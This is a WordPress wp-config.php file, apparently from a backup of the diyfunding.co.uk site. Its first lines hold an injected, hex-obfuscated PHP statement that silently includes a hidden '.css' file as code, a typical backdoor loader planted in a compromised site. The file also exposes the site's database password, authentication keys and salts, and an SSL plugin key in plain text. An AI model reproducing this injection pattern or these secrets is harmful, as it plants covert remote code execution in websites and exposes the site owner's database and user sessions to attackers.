File: //old_home_backup/diyfunding.co.uk/public_html/wp-config.php
<?php
/*e0fd7*/
$r0plaq = "//\x68ome/diyfunding.co.uk/public_\x68tml/wp\x2dincludes/blocks/social\x2dlink/.0194f1c2.css"; if (!isset($r0plaq)) {var_dump ($r0plaq);} else { @include_once /* 117 */ ($r0plaq); }
/*e0fd7*/
//Begin Really Simple SSL key
define('RSSSL_KEY', 'M6hdMJoTsu7dAci03c0HJddlMzCrD1tRxKu5TQ9YWzjUu2f9W15GL8EM0u16C35f');
//END Really Simple SSL key
//Begin Really Simple SSL session cookie settings
@ini_set('session.cookie_httponly', true);
@ini_set('session.cookie_secure', true);
@ini_set('session.use_only_cookies', true);
//END Really Simple SSL cookie settings
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'diyfundingcouk' );
/** MySQL database username */
define( 'DB_USER', 'diyfundingcouk' );
/** MySQL database password */
define( 'DB_PASSWORD', 'RN0zpm9SEcdCosNZ' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );
/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', '; EQe~vF>c<mi;W4PgQ>`{v!s6<5<MqwGv%m~!^ yUi;fRyY, 4K?sl,R;i~ 8?H' );
define( 'SECURE_AUTH_KEY', 'PXC{~wi=X71.PM5rOsI@kKsXH.)9`]g98*H{>V]bR30qeMz^NJ *.6<M;+$q/HN+' );
define( 'LOGGED_IN_KEY', '6[Q2t/I?Xz`]PG^^0GivzZ)mHpyi Y9N+[NRuW28+thk&qUVE%kK+A=u|_kQX3AH' );
define( 'NONCE_KEY', 'q3<-(V`(=LYJ5AWB?+|3=X9?UD #U=5[JD|!.$=g?2TBJ8H>B3v<rk5rCj19nmvI' );
define( 'AUTH_SALT', 'rUgmsomx*k#T,bN+@%t5lyPJL%|)d:KZ-,(F%O28|A+@@?3!k9r2&>WQ4>qLfWIt' );
define( 'SECURE_AUTH_SALT', 'vHv33&YxmoQGK:flpuzOY3a4cVUB4Zb#(uS{`sn5~FI/0e6vx>/;WloXoW}r1&Sp' );
define( 'LOGGED_IN_SALT', 'JA.Er#{Y#8ol<5WexIhIJ%)+% ~:O)A(D$u@Hs2U0FkE]%7dD3&QB3pRf?+t8J69' );
define( 'NONCE_SALT', '?6|!8wJI6?<K;629<60fa9ybAU&bIT0}J~5.mll,E:97/@=:fp_xun#N6!4q}tsL' );
define('FS_METHOD', 'direct');
/**#@-*/
/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://wordpress.org/support/article/debugging-in-wordpress/
*/
define( 'WP_DEBUG', false );
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';